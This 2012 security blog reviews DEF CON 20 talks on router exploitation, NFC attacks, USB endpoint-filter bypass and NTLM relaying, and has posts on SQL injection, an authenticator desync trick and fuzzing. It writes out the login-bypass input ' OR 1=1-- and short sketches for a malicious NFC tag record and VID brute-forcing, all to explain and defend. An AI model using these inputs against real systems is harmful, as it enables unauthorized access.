lavamunky security blog
...let's see how deep the rabbit hole goes
Thursday 9 August 2012
Defcon 20 - Thoughts on 10 days in Vegas or at least what I can remember of it. Part 3
This is the third part of a series about my first time in Las Vegas and at defcon. If you missed either of the first two, you can find part 1 here and part 2 here. As this is the third part, I'm going to be discussing the talks from the Sunday, the last day of defcon. We start at the start of Sunday..
..Feeling pretty refreshed surprisingly, and there's some interesting talks on in the morning, but it's mainly the ones in the afternoon I'm looking forward to..
We have you by the gadgets by Mickey Shkatov, Toby Kohlenberg
I actually saw this talk at blackhat (the slides can be found here), so I'm presuming the content was identical. I quite liked this talk, and there had been a bit of buzz around it, as Microsoft had officially told the public to turn off Windows sidebar gadgets completely due to the research done for this presentation. Mickey and Toby started off the talk by going over what gadgets are, and why, despite their decline in use, this actually matters: this style of application development is taking off in a big way, especially within the phone applications market.
They also realised, looking at gadgets, that they are simply zip files containing a regular webapp made out of HTML, CSS and JavaScript, or made out of Silverlight (although out of the apps they tested, they admitted finding very few made from Silverlight).
Somewhat surprisingly, Microsoft have a fairly standard security model and even have guides to help with secure development of gadgets, but despite this, for the most part gadgets are actually very insecure programs. After this they went through their two main attack scenarios:
-Attacking with gadgets, and
-attacking gadgets themselves.
Attacking with gadgets was a fairly simple malware attack: get somebody to install your gadget. People are perhaps slightly more trusting as they don't see gadgets as proper programs, but in the end you can still execute code. Along with this was a demo showing that gadgets share the browser's cache, and so can see all the cookies etc. from a person's browser.
As for attacking gadgets themselves, they found that in a lot of places where they tried to download gadgets, it was often malware hiding as gadgets in the first place. Beyond that, there was a lot of shared code written with poor security practices, which in the end was fairly trivial to break. One simple example: very few gadgets would download updates over SSL, making it very easy to set up a proxy and inject whatever malicious code you want.
In conclusion, I thought this presentation was quite good and it came with a couple of funny demos, but it was just astonishing that so many applications were written so poorly and were so vulnerable to attack, although they did point out that the gadgets written by Microsoft themselves seemed very secure and were all written in Silverlight.
Owning the network: adventures in router rootkits by Michael Coppola
This talk was yet again something quite low-level; although not quite hardware hacking, it looked at the software on the routers themselves. Because the majority of routers out there run a version of Linux, their source has to be released, and it turns out the vast majority run Linux kernel versions 2.4 to 2.6, which were released a long time ago and so are bound to have holes in them, but that wasn't really the focus here. I'll note that it was quite good to see that asking the vendor can sometimes help: part of the source (their customised version of unsquashfs) was missing, and after discussing it with the vendor for a couple of weeks, Michael finally received an email with a download for the last piece of software he needed to finish looking over the OS and patches. But the main part of the talk was about creating rootkits for the router, and after going through making one by hand, he went through the Router Post-Exploitation Framework (RPEF) he had created to basically automate this for other images. It lets you create a rootkit with an exploit of choice, add it to an image, and flash the image onto the router to pwn it whenever you want.
In conclusion though, I quite liked this talk. I admit I don't know much about rootkits but it was an interesting topic and I'm sure I'll be looking further into them in the future, plus the framework along with slides can be found on Michael's website: http://www.poppopret.org/.
..That was another great talk, although this track seems like it has twice the number of people it can actually hold, and everyone wants to see the next talk too. Ruh-roh...
Hacking [redacted] routers by FX, Greg
I've got to start this off by saying this was a shocker, partly because of the presentation and partly because of the audience. This was an hour-long talk, but it was put into track 4 (the smallest), and after waiting in a couple-of-hundred-metre line for the talk before, everyone in the room still wanted to see this talk, along with the 500 or so waiting outside. But the goons were excellent and realised halfway through the previous talk that there was a serious problem with space, so they stopped everyone passing in the hallway so that a couple of thousand people could move from track 4 to track 1, which was no mean feat, and they pretty much made it go off without a hitch.
But anyway, back to the talk. It was really good, and if you haven't already heard (it's been all over the infosec news), [redacted] actually refers to Huawei. FX started off by going through who the company are, their line of products, and how huge they are across the entire world. Since they're Chinese-based, there has been a lot of controversy around them, as certain countries have been unwilling to use, or even slightly scared of, their products being backdoored, allowing people in the Chinese government easy access. However, they also went over the strange fact that Huawei appear to have no way of having vulnerabilities disclosed to them 'responsibly': it seems difficult to get into any sort of contact with a security department or person within the company, and any security updates to their software are not marked as such, so the way they go about things is a bit odd to start with.
After this FX went onto the VRP (Versatile Routing Platform), which is the software platform used on the vendor's data communication products, went through a few versions of it and some problems with them even before trying to attack the machines, and covered some of the features of the VRP. He also went through information about the images and the default services; stupidly, being able to turn off the standard services is a new feature and can't be done on older routers.
Then FX got to code quality, or the lack thereof, and some of the code decisions were just shocking: one image calls sprintf 10,730 times and another calls it 16,420 times, there were often reimplementations of commonly flagged functions such as memcpy, strcpy, strnstr, etc., the NULL page is mapped RWX, and their SSH server is a complete rewrite which even fails poorly. Then it was down to looking at the Web UI for a change (which only works in Internet Explorer), which uses a poorly designed session ID that is easy to spoof, making logging in trivial (they showed a small perl script which could create the session ID). Slide after slide brought more insecurities in the software, including easy-to-find buffer overflows.
After the buffer overflows, Greg came on and started talking about the heap, as they had found a fairly straightforward heap overflow in the BIMS client function which parses an HTTP response, and he went through in great detail how to exploit the vulnerability. Their conclusion was simple: the routers have 90's style bugs, which require 90's style exploitation, as there is no OS hardening, along with no security advisories and not even any security releases. They didn't appear to have any backdoors, but there are so many holes in the routers that there doesn't need to be, and at least Huawei could have plausible deniability by just claiming the software was insecurely written.
In my own conclusion though, this was a really fun talk, getting down to software bugs and exploitation, and showing that Huawei routers may be scary, but not because of backdoors, just because of their plain lack of security. The slides for this excellent talk can be found on the phenoelit website here: http://phenoelit.org/stuff/Huawei_DEFCON_XX.pdf
..Wow, people actually worry about China backdooring products? Seems you should be more worried about somebody hacking your router from a car outside than about the Chinese government. Anyway, I like games so let's see about hacking them...
Fuzzing online games by Elie Bursztein, Patrick Samy
This was an interesting talk and something a bit different from the norm. It went over how they fuzzed the online elements of two example games, Diablo III and League of Legends. Even between these two games, the security measures to stop people from even trying to fuzz them are wildly different, and Elie and Patrick went through how they went about reverse engineering and fuzzing the online parts of each game, along with the difficulties they had and how they managed to get around them.
It was fairly interesting, but it was very specific to the particular games, and although it was funny in parts it just seemed a little lacking in something. I know these aren't very constructive comments, but it just didn't seem to have anything particularly new; it was just the fact that it was a game instead of a 'normal' program.
..Hmm mixed feelings about that talk, but I better get to the next talk quick as it looks like it will be completely packed. Should be interesting..
Owned in 60 seconds: from network guest to Windows domain admin by Zack Fasel
Zack was a new speaker at defcon, but apart from failing at demoing (much drinking was done as punishment), I thought this was a really good talk. It was a talk on SMB, and particularly about NTLM and NTLM relaying (not passing the hash), and how he could basically own pretty much anything with it. Now, I didn't take notes during this talk (my bad), and Zack's slides are nowhere to be found at the moment (they're not online yet and the disk says the URL they will be at when online), so this post may require an update at some point, as I'm trying to remember all of this off the top of my head. He went over NTLM, the different versions and the things wrong with them, basically covering things which had been discussed elsewhere before, but his point was that this has been going on for so long that it really should be solved by now. So after the success of Firesheep, which showed it can be really easy to hijack an HTTP session, Zack wanted to create a tool, ZackAttack, to show the ease with which you could relay hashes and completely own an entire network, let alone a single person's account. Although his demo didn't work (cue drinking), he still went through some of the tool, showing how it would work, and it honestly looked like a really slick tool and something which could be used by somebody who barely knows what they're doing. It may be quite a good tool to show alongside a pentesting report, to show companies just how easy this is to do, in the same way armitage can show the layman how easy it can be to hack computers.
In conclusion, it was a shame the demo didn't really work but it was a good talk nonetheless and I would definitely like to see Zack back at defcon speaking again.
Notable other talks I didn't get to see but wanted to:
-SIGINT and Traffic Analysis for the Rest of Us
-No More Hooks: Trustworthy Detection of Code Integrity Attacks
-Post Metasploitation: Improving Accuracy and Efficiency in Post Exploitation Using the Metasploit Framework
-Looking into the Eye of the Meter
-Can Twitter Really Help Expose Psychopath Killers' Traits?
-SQL Injection to MIPS Overflows: Rooting SOHO Routers
-Hacking the GoogleTV
-bbqSQL: Blind SQLi Exploitation
-How to Hack All the Transport Networks of a Country
So that was it for my talks at defcon. I'm only including the official talks here and not the hacker pyramid or any of the parties, but they will probably be discussed in another post, along with any crazy experiences I can remember from my first time in Las Vegas. I can gladly say I had a great time. I managed to get into blackhat (I was working, but I managed to get to a couple of talks), had an awesome time at defcon and the parties around everything, plus I got to see Las Vegas for the first time. Along with all of this, I managed to finally meet a lot of people I previously only knew from twitter, and met a ton of great new friends along the way (shocking news: some people working in the security industry are NOT on twitter).
But even though I had a great time, it still seems like I missed so much. I didn't get a ticket to BSidesLV, I didn't get around to going to hacker jeopardy (although I was at the 303 party at the time, which made up for it), I didn't manage to get to the hardware hacking village, I spent very little time in the CTF and lockpick village, and I didn't get into the wireless hacking village at all. So despite the fact I had a great time, I feel I owe it to myself to go again next year, or at least that's my excuse ;)
..Now to stop drinking and go on a diet in preparation for BruCON..
Part 1 Part 2
Tuesday 7 August 2012
Defcon 20 - Thoughts on 10 days in Vegas or at least what I can remember of it. Part 2
..Head still pounding..I need coffee...guess I should go to my first talk of the day though after sleeping through..
Friday 3 August 2012
Defcon 20 - Thoughts on 10 days in Vegas or at least what I can remember of it. Part 1
This was my first time at defcon and in Las Vegas at all, and I really wanted to make the effort to meet new folks, see as much of defcon as possible and catch as many great talks as possible. This is the first post in a series which will cover defcon, the talks, the social aspect of it, and Las Vegas in general.
And although a bit belated, this post in particular is about the talks I went to on the Friday of defcon, which was the first full day. The Thursday had a few events throughout the day, but I wasn't able to attend those, so I'll start here.
..At the Rio, have my badge and amazingly despite what I've heard, there was practically no line, except to buy the official swag. So onto my first talk of defcon..
Making Sense of static - new tools for hacking GPS by Fergus Noble and Colin Beighley
This was my first talk of the day, and as far as talks go, this wasn't the best presentation I've ever seen. Although I first thought the idea for the talk was quite a good one, there was simply too much time spent going through the technical details of how GPS works, waves, and other not-too-interesting details. Although a tool was introduced, very little time was actually spent on it, whereas I thought it should have been the other way around, or at least near equal amounts of time. I'm not sure if both or either of the speakers were first-timers, but there were a few moments of stopping and staring into space as they had forgotten what they were going to say, which seemed to be down to nerves. In the end I thought the subject matter could have been interesting, but it just wasn't presented as an interesting subject, and it seemed almost like a research talk instead of a talk about a tool that had been created.
..So not a great start to my defcon talks, but onto the next..
Passive bluetooth monitoring in scapy by Ryan Holeman
I thought this was quite a good talk, although at the start Ryan said he had given it at blackhat where he had more time, and so had to shorten it for defcon, which was a shame, but the talk was still good nonetheless [Update: Ryan contacted me on twitter and it turns out I misheard; this was actually longer than the one at blackhat. Still, I wish the talk could have been a little longer, just because it was a cool tool]. Ryan started with an overview of bluetooth and the ubertooth board (further information about the ubertooth project can be found here), which is used to interact with bluetooth, and the scapy-btbb library he created with the simple goal of getting at bluetooth baseband traffic with python.
This will allow easy data analysis of btbb (bluetooth baseband) traffic, with the compatibility across hardware through using pcap files, and so can be easily integrated into tools for debugging, auditing, or exploitation, whichever is your inclination.
Now, I haven't used the library myself, but Ryan went through a couple of demos and it generally seemed to have at least the basic functionality you would want: reading btbb packets from a pcap, seeing all the information to do with the bluetooth packets, writing btbb pcap files, and streaming btbb packets. Basically everything that would seem to be needed for integrating it into debugging, auditing or exploitation.
He has also added some handy extra functionality to the library; the part I particularly liked was the fact you can get the vendor name. As Ryan noted, it can be difficult keeping track of multiple bluetooth signals, and a name is generally easier to keep track of than a MAC address.
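Under the hood, a vendor-name lookup like that is just a check of the address's OUI (the first three bytes) against the IEEE registry. A rough, hypothetical sketch of the idea (this is not scapy-btbb's actual API, and the table below is a tiny made-up sample rather than the real registry):

```python
# Minimal sketch of mapping a device address to a vendor name via its
# OUI (first three bytes). A real tool would load the full IEEE OUI
# registry; this table is a tiny illustrative sample.
OUI_TABLE = {
    "00:02:72": "CC&C Technologies",
    "00:1A:7D": "cyber-blue(HK) Ltd",
    "9C:20:7B": "Apple, Inc.",
}

def vendor_for_address(bd_addr: str) -> str:
    """Return the vendor for an address like 'AA:BB:CC:DD:EE:FF'."""
    prefix = ":".join(bd_addr.upper().split(":")[:3])
    return OUI_TABLE.get(prefix, "unknown")

print(vendor_for_address("9c:20:7b:12:34:56"))  # Apple, Inc.
print(vendor_for_address("12:34:56:78:9a:bc"))  # unknown
```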
..So getting warmer. What next?
Don't stand so close to me: an analysis of the NFC attack surface by Charlie Miller
Ok now this is the kind of talk I wanted to see while at defcon. Charlie actually did this talk at blackhat as well, so as of the time of writing the slides can be found here.
It turns out this all started when Charlie was having a conversation with Moxie Marlinspike, who happened to tell him the NFC stack was poorly designed, which is what got Charlie interested in the subject. But anyway, back to the presentation. Charlie started off as you would expect, going over the NFC protocol, and as he realised, despite such a small number of bytes being sent, the protocol is actually quite complex. There are two different ways an NFC communication can take place: either
-there is an initiator and a target e.g. a NFC-enabled phone and an NFC tag, or
-it can be done peer-to-peer, which needs two devices which are powered e.g. two different NFC-enabled phones.
After this he went into far greater detail than I will here, but it can all be seen in the paper I've linked to above, along with example data to give you an idea of what's happening. Now we're finally onto the interesting part that people want to hear about: fuzzing of the NFC stack (or is that just me?). This was particularly interesting for me. He went through his setup, including what hardware was used for emulating a passive tag, and how he automated the fuzzing so that he wouldn't have to sit there manually placing the phone near an emulator and taking it away again (especially in fuzzing, where test cases often range into the thousands or tens of thousands, manual=bad and automated=good; for an overview of fuzzing you can see a previous post about it here). I thought it was interesting to note that as Charlie was fuzzing wildly different sections, he used both generation and mutation based fuzzing, and he went through what was fuzzed in which way for each platform tested, and some results which at face value seem not that interesting.
However, the talk became most interesting when you delve into what the phone does with the data it receives, rather than whether there are issues parsing it. When you look into this, the attack surface for NFC gets blown wide open: for starters, with android you can get people to visit a website in the browser with NO USER INTERACTION. As you can imagine, given the number of different file formats handled by web browsers and their plugins, this has all of a sudden changed from just the NFC stack into an enormous attack surface. There are some caveats depending on the platform being used, but Charlie went through these and possible workarounds. And with these came the real crowd pleasers: the demos. Charlie had multiple demos showing different attack scenarios, all leading to full exploitation of the other person's phone. In general it seemed that although there was a bug found in Android 2.3 (fixed in a later version, but the vast majority of android phones use 2.3 or lower), the major problem with NFC is what's done with the data. NFC in itself isn't too insecure; the platforms just hand the information straight to another application without a second thought.
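To give an idea of how little an attacker needs on the tag side, here's a rough sketch of building the kind of NDEF URI record a malicious tag might carry to trigger that no-interaction browser launch. This is not Charlie's code; the byte layout follows my understanding of the NFC Forum URI record definition, so check it against the spec before relying on it:

```python
# Sketch of a single short NDEF URI record. The first payload byte is a
# prefix code that abbreviates common URL beginnings (0x00 = no prefix).
URI_PREFIXES = {0x01: "http://www.", 0x02: "https://www.", 0x03: "http://"}

def build_uri_record(url: str) -> bytes:
    """Build one short NDEF record holding a URI."""
    code, rest = 0x00, url
    for c, p in URI_PREFIXES.items():
        if url.startswith(p):
            code, rest = c, url[len(p):]
            break
    payload = bytes([code]) + rest.encode("utf-8")
    header = 0xD1  # MB=1, ME=1, SR=1 (short record), TNF=0x01 (well-known)
    # header, type length, payload length, type 'U', then the payload
    return bytes([header, 0x01, len(payload), 0x55]) + payload

record = build_uri_record("http://www.example.com")
print(record.hex())
```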
..This is going pretty well. What else could there be going on?
Bypassing Endpoint security for $20 or less by Phil Polstra
With this talk I really didn't know what to expect, and I'll fully take the blame for that, as I didn't read further information about the presentation. This was about endpoint security of USB sticks: when only certain USB sticks are allowed to connect to a machine (filtered by their VID/PID -- the equivalent of MAC filtering in networking), you can still get any USB stick to connect to the machine and mount, successfully and cheaply. Phil initially went through the hardware and software in use and how the parts communicate with each other in detail (some C knowledge is advised), particularly with mass storage devices (like USB sticks). Then we got down to the interesting part and what needs to be done: basically, a microcontroller is used as a proxy between the USB stick and the computer, except it changes the VID to a valid one, effectively spoofing it. Phil went through the particular chip choices and detailed information about them, and then the implementation, which does one of two things: use a known valid VID to impersonate, or brute force its way to a valid VID. Luckily Phil has also done a lot of the hard work and has a list of the most common VIDs [update: Phil has told me he didn't create the list, but found somebody who maintained one. This is attributed in the code, which can be found here], and in the chance a valid VID isn't in this list, it will brute force through every possible iteration. Plus, as a nice addition, a demo showed the bypass in action.
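The two modes boil down to a search order over the 16-bit VID space: try the common ones first, fall back to everything else. A hedged sketch of that idea (the 'common VIDs' below are an illustrative sample I've picked, not Phil's actual list):

```python
# Sketch of the search order described above: known common vendor IDs
# first, then brute force the rest of the 16-bit VID space.
COMMON_VIDS = [0x0781, 0x058F, 0x0951, 0x090C]  # illustrative sample only

def candidate_vids():
    """Yield VIDs to impersonate: common ones first, then all the rest."""
    seen = set()
    for vid in COMMON_VIDS:
        seen.add(vid)
        yield vid
    for vid in range(0x10000):  # full 16-bit space
        if vid not in seen:
            yield vid

gen = candidate_vids()
print([hex(next(gen)) for _ in range(6)])
```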
I do wish, in hindsight, that I knew more about microcontrollers, as I feel if I knew more about them or hardware hacking in general, I would've enjoyed the talk more. Still, the talk had many interesting and funny moments and opened my eyes a bit to the hardware side of hacking.
..That was a bit enlightening. Is there anything going on in the last talk of the day?
Anti-Forensics and Anti-Anti-Forensics: Attacks mitigating techniques for digital-forensic investigation by Michael Perklin
I'll fully admit I know practically nothing about computer forensics, but seeing as I was at my first defcon and had just learnt something interesting about an area of security I knew nothing about (hardware), I thought I would try something else I knew absolutely nothing about. So, onto the talk: Michael Perklin made this a funny talk, mostly down to his constant drinking whenever he forgot to mention his running total (which I'll get onto later).
Michael went through the methodologies taken by forensic investigators and the general workflow used. What I found particularly interesting was that he continuously made it clear that it isn't about stopping the forensic investigator (they can be stopped in a few simple ways, for example destruction of the physical media) but about mitigation: slowing down the forensic investigator trying to find information (as shown in the title). Basically, the more time it takes, the more money it takes, and therefore the bigger the likelihood that the prosecutor will just want to settle out of court or stop the trial altogether. He quite cleverly kept a running total of hours and cost in the corner of each slide, and every time he forgot to mention that the cost had gone up, he had to take a drink.
Notable talks I didn't get to see (but wanted to):
-welcome & badge talk
-APK File infection on an Android System
-Owning one to rule them all
-drones!
-NFC hacking: the easy way
-detecting reflective injection
-how to hack vmware vcenter server in 60 seconds
-new techniques in SQLi
-post-exploitation nirvana: Launching OpenDLP agents over Meterpreter sessions
-The art of the con
-safes and containers - insecurity design excellence
-blind xss
Sunday 20 November 2011
Why parameterized queries stop SQL injection attacks
An updated version of this article can be found here (How do prepared statements protect against SQL Injection?)
I've recently got a new job, and as such have been going through a lot of documentation and 'recommended reading' (which I actually read, because I had so much free time). One of the many topics was the various types of vulnerabilities and how they work, and surprisingly it also told you various ways to actually help defend against these attacks.
Now, the other day I was down the pub talking with a friend who has recently got a developer job (we're both just out of university, so many people I know have either just got a job or hopefully will in the near future), and he didn't understand parameterized queries and how they actually stop SQL injection attacks. This I found totally understandable, as when articles talk about parameterized queries stopping SQL injection they don't really explain why; it's often a case of "It does, so don't ask why", possibly because they don't know themselves. A sure sign of a bad educator is one that can't admit they don't know something. But I digress.
Why I found the confusion totally understandable is simple. Imagine a dynamic SQL query:
sqlQuery="SELECT * FROM custTable WHERE User='" + Username + "' AND Pass='" + password + "'"
so a simple sql injection would be just to put the Username in as ' OR 1=1--
This would effectively make the sql query:
sqlQuery="SELECT * FROM custTable WHERE User='' OR 1=1--' AND Pass='" + password + "'"
This says: select all customers where their username is blank ('') or 1=1, which always evaluates to true. The -- then comments out the rest of the query. So this will return the whole customer table, or do whatever you want with it; if used for logging in, it will log in with the first user's privileges, which is often the administrator.
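To make that concrete, here's a small Python sketch (with a hypothetical helper name) of the string concatenation above and the query it produces:

```python
# Building the query by concatenation: attacker-supplied input becomes
# part of the query text itself.
def build_query(username, password):
    return ("SELECT * FROM custTable WHERE User='" + username +
            "' AND Pass='" + password + "'")

# The injected username closes the quote, adds OR 1=1, and comments
# out the password check entirely.
print(build_query("' OR 1=1--", "whatever"))
# SELECT * FROM custTable WHERE User='' OR 1=1--' AND Pass='whatever'
```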
Now parameterized queries do it differently, with code like:
sqlQuery='SELECT * FROM custTable WHERE User=? AND Pass=?'
parameters.add("User", username)
parameters.add("Pass", password)
where username and password are variables pointing to the associated inputted username and password
Now at this point, you may be thinking this doesn't change anything at all. Surely you could still just put something like Nobody OR 1=1'-- into the username field, effectively making the query:
sqlQuery='SELECT * FROM custTable WHERE User=Nobody OR 1=1'-- AND Pass=?'
And this would seem like a valid argument. But, you would be wrong.
The way parameterized queries work is that the sqlQuery is sent as a query, and the database knows exactly what this query will do; only then are the username and password inserted, merely as values. This means they cannot affect the query, because the database already knows what the query will do. So in this case it would look for a username of "Nobody OR 1=1'--" and a blank password, which should come up false.
This isn't a complete solution though, and input validation will still need to be done, since this won't affect other problems such as XSS attacks: you could still put JavaScript into the database, and if this is read out onto a page, it would be run as normal JavaScript, depending on any output validation. So really the best thing to do is still use input validation, but also use parameterized queries or stored procedures to stop any SQL injection attacks.
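If you want to see both behaviours for yourself, here's a minimal sketch using Python's sqlite3 module, which happens to use the same ? placeholder style; the table and values are made up for illustration:

```python
# Demo: the same injection string succeeds against string concatenation
# and fails against a parameterized query.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE custTable (User TEXT, Pass TEXT)")
conn.execute("INSERT INTO custTable VALUES ('admin', 'secret')")

evil = "' OR 1=1--"

# Vulnerable: attacker input is spliced into the query text.
rows = conn.execute("SELECT * FROM custTable WHERE User='" + evil +
                    "' AND Pass='x'").fetchall()
print(len(rows))  # 1 -- the injection returned the admin row

# Parameterized: the input is bound as a value, never parsed as SQL.
rows = conn.execute("SELECT * FROM custTable WHERE User=? AND Pass=?",
                    (evil, "x")).fetchall()
print(len(rows))  # 0 -- no user is literally named "' OR 1=1--"
```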
Monday 12 September 2011
Annoying geeks...a World of Warcraft DoS & security of tokens
Note: this is a post saying how this is possible, not indicating that you should do so. And it's not permanent, it will just make them hate you until it's fixed.
So I noticed about a year or so ago that a friend of mine, who plays World of Warcraft, uses a token device called "The Blizzard Authenticator"; more information can be found here.
It generates a 6-digit numeric code that has to be entered along with the username and password of the user. One simple way to effectively DoS the user is to simply steal the device, whereas a smarter way, which will probably make them think something's wrong with the token, and probably make them spend lots of time trying to fix it, is simply to press the button 10 times or so.
Since tokens generate a (pseudo-)random number, hitting the button enough times will make the device show every code in the whole keyspace of 000000-999999. Because of this, technically every number is a valid number, but if the server just took every 6-digit number as correct, the token would add no security. The way they get around this is to have a window of acceptance. They take the 6-digit code from the user's last successful login and apply the same function the token device uses to produce the next code; this should give the next code the token will show. However, that alone would mean a window of acceptance of just one code, which would be pretty ridiculous, as accidentally pressing the button twice would mean you've wasted all your money on a token. So they have a larger window of acceptance, perhaps 5 or 10: they apply the function to each subsequent result and keep a list of codes that will be accepted.
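As a toy illustration of that window of acceptance (the real authenticator's algorithm isn't public, so a trivial additive stand-in plays the part of the token's next-code function):

```python
# Toy simulation of a window of acceptance. next_code is a deliberately
# trivial stand-in for the token's real next-code function.
def next_code(code: str) -> str:
    """Derive the next 6-digit code from the previous one (stand-in)."""
    return str((int(code) + 123457) % 1000000).zfill(6)

def server_accepts(last_good: str, submitted: str, window: int = 10) -> bool:
    """Accept any of the next `window` codes after the last good login."""
    code = last_good
    for _ in range(window):
        code = next_code(code)
        if code == submitted:
            return True
    return False

last = "123456"
# Press the button three times: still inside a window of 10.
pressed_3 = next_code(next_code(next_code(last)))
print(server_accepts(last, pressed_3))   # True
# Press it 20 times: the token has run past the window -- desynced.
code = last
for _ in range(20):
    code = next_code(code)
print(server_accepts(last, code))        # False
```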
World of Warcraft isn't the only application of tokens, the reason I used WoW for this blog post is partly because I know somebody that uses one of the devices, and partly because of what one has to do to fix it. On the WoW wiki, it shows that if your token breaks, you need to contact the World of Warcraft billing department with the following information:
- Your full real name.
- Your full address including postal or zip code.
- Your full email address (currently registered on the account).
- Your account name.
- The authentication key used to create the account.
- Your Secret question and answer.
- The last 4 digits of the credit card used on the account plus the expiration date OR the full code of a game card activated on the account.
- A legible fax, scan or photo of a piece of government-issued photo identification, such as a passport or driving license matching the first and last name of the registered account owner. (No idea if this is kept on record but I sure hope not)
- A legible fax, scan or photo of the Authenticator token, with the code on the back fully visible.
This is an immense amount of security for a game (perhaps even too much). I'm really impressed as there are banks with less security than this (probably because sending photos of ID and the broken token would take so long)
So in the end, if you know somebody who plays WoW, and they use a token device, don't go around pressing the token device 10 or 20 times (or giving them to small children who will just do the same). Or if you do, expect them to be annoyed until they manage to get it reset, which judging by how much information they need to give, may take a while.
p.s. I don't play World of Warcraft, I'm not a fan, but I think Blizzard are doing a decent job to make people feel protected against others stealing their account, and in the end, I feel tokens are a good idea.
Tuesday 28 June 2011
Get your fuzzers ready...
What I have really been doing though is focussing on fuzzing, the theory behind it, and setting up my home lab for both bug hunting and general trying to get better at pentesting. The idea of fuzzing and bug hunting is really interesting to me, since there are practically unlimited different ways to try to break a program.
It's the same idea as for all security -- an attacker has to only find one way to get in, a defender has to attempt to stop every single possibility, and you could use the same thing with a security-minded programmer versus a bug hunter.
But back to fuzzing in particular, in case you don't know the basic techniques of fuzzing, there are two main ones -- mutation-based and generation-based.
Generation is a much more comprehensive type of fuzzing, since the input is generated and can be constructed so that it tests every known feature of a program. The major flaw with this technique (and the main reason it's not used as much as the other) is purely time. You could argue it's also down to knowledge, but I'm lumping knowledge in with time. The reason building a generation-based fuzzer takes so long is that in order to generate the data, you need to know how the data is constructed. Now with simple protocols and filetypes this isn't such a bad thing, as there may not be a lot to learn before you can generate data, but with proprietary protocols and anything that hasn't been well documented/reverse engineered, this becomes a major problem. You might spend months reverse engineering the protocol and making the best fuzzer possible, just to find out that there were no problems with the particular program (or at least none your fuzzer could find). The argument goes that since generation-based fuzzers are specific, they pay off over time: if you're testing many different programs you just need the one fuzzer, and it can test all of them for a specific file format or protocol.
However, the startup cost is usually so great that it is often easier to just use mutation-based fuzzing instead. With this technique the tester takes sample data, changes it, and feeds it into the program being tested. The only problem is that this technique will not get past security measures (you're pretty screwed against encrypted traffic), checksums, or anything calculated over parts of the data.
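To make the technique concrete (this is an illustration, not any particular tool's code), a dumb mutation fuzzer can be as small as a byte-flipping loop over a sample file:

```python
import random

def mutate(data, nchanges=8):
    """Return a copy of `data` with a handful of randomly chosen
    bytes overwritten with random values."""
    buf = bytearray(data)
    for _ in range(nchanges):
        buf[random.randrange(len(buf))] = random.randrange(256)
    return bytes(buf)

# in practice the sample comes from disk, e.g. open('A.pdf', 'rb').read()
sample = b'%PDF-1.4 some sample data to mutate ' * 8
fuzzed = mutate(sample)
# write `fuzzed` out, open it in the target program, watch for crashes
```

This is also exactly why encrypted or checksummed formats defeat plain mutation: random changes almost never survive the integrity check.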
Luckily, there are two compromises:
--find out some of the protocol/file type
--mutate a lot of files
You may think that finding out about the protocol/file type is the same as generation fuzzing, but this is meant to be used with mutation-based fuzzing. And you may also be wondering: if you're already going this far, why not just go and build a generation fuzzer?
This is a valid point; however, this way you need to know a lot less. For example, say you are reverse engineering a proprietary filetype and you've spent days trying to find out what a particular section of 10 bytes is for. If you're making a generation fuzzer, you have to keep getting other files and reversing them so that you can generate files correctly, but if you're doing mutation-based fuzzing you can simply mark the section as "fuzz it" or leave it as static. The bare minimum you need to know for this type of fuzzing is what stays the same in each sample and what differs; then you can say "fuzz it" or "it's static, don't fuzz it". Of course, the further into the protocol/file type you get, the better the results that can be obtained, and there are programs that try to do this for you (I haven't personally researched them, but there may be a blog post coming up about them at a later date). Another advantage of this approach is that if there is a checksum or hash that needs to be computed, this technique can handle it. If checksums aren't fixed up, the data will most likely just be rejected, effectively losing a potentially huge chunk of the program that cannot be tested with plain mutation-based fuzzing.
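As a sketch of the checksum point, imagine a made-up format whose last 4 bytes are a CRC32 over everything before them (the format and field layout here are assumptions for illustration). The fuzzer mutates the body and then recomputes the checksum so the file isn't rejected outright:

```python
import random
import struct
import zlib

def fuzz_with_checksum(data):
    """Mutate one body byte of a (hypothetical) format whose last
    4 bytes are a little-endian CRC32 of the body, then fix up the
    checksum so the parser doesn't reject the file immediately."""
    body = bytearray(data[:-4])
    body[random.randrange(len(body))] = random.randrange(256)
    crc = zlib.crc32(bytes(body)) & 0xffffffff
    return bytes(body) + struct.pack('<I', crc)

# build a valid sample of the toy format, then fuzz it
body = b'HDR:payload bytes here'
sample = body + struct.pack('<I', zlib.crc32(body) & 0xffffffff)
fuzzed = fuzz_with_checksum(sample)
```

Without the fix-up step, every mutated file would fail the integrity check before any interesting parsing code ever ran.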
Mutating a lot of files basically means you will go through a lot more branches of the program's execution, and you will get much better code coverage (a program could potentially be used to measure this). This is a technique that has been covered well by Charlie Miller here. It will most likely give a compromise between the amount of time spent and problems found. Similar to the technique above, there is a lot of startup time: collecting samples, getting them into an easy form to fuzz, and fuzzing them will take a long time since there are a lot of documents (in the slides above, Charlie Miller says it would take around 3-5 weeks to fuzz using his own code running in parallel on 1-5 systems at a time). However, this is still often shorter than the amount of time it would take to create a generation fuzzer for a proprietary file format or protocol.
I have personally spent some time setting up machines for doing fuzzing the latter way. Here are some problems and solutions I have found thus far:
(note: I have created scripts for many of these jobs, which I am not suggesting you use, since in some cases they may possibly go against websites' Terms of Use)
So I decided I would start off on my desktop fuzzing PDF software, so I first investigated what software actually uses PDFs. This isn't just Adobe PDF reader. There are different viewers, editors, converters, creators and other things applications can do with PDFs. A decent list (with specific platforms) can be found on wikipedia at http://en.wikipedia.org/wiki/List_of_PDF_software, however this isn't a complete list, and I'm pretty sure it doesn't include any web browser plugins.
So now I have a list of possible software - what am I going to fuzz and what platform am I going to use?
Well, I decided that since I know Linux and Windows best, I would use these (I do have the possibility of testing Mac software, but I don't want to fuck up my Mac, and as far as I know it's still not really possible to put OS X in a VM without hacks).
Since I have a desktop able to stay on all night and day fuzzing these (a Core i5 with 12GB of DDR3), I have installed VMware Workstation and will install a few VMs of each, with exactly the same environments, since Workstation is able to clone virtual machines.
For downloading files from the internet, I created a script that simply scraped them from Google. Since I couldn't be bothered to find out how to page through each search result, I just put a different number in with the filetype in each search. It isn't the best working script ever, and won't find every possible PDF in the results, as I had to make a compromise between how long I wanted it to take and which strings the regex would find; adding even more possibilities to the regex made the runtime grow rapidly. I believe I found a decent compromise and have put it here. As I noted before, Google may have something against scripting in its Terms of Service and as such this should not be used; plus there is a limit of around 650 results, at which point Google brings up a CAPTCHA. (And if you can script your way around a CAPTCHA, you deserve a medal.) If you wish to download more, you could try different IPs (which is how I imagine it detects scripting) or just wait the required time, which I believe to be around 30-60 minutes.
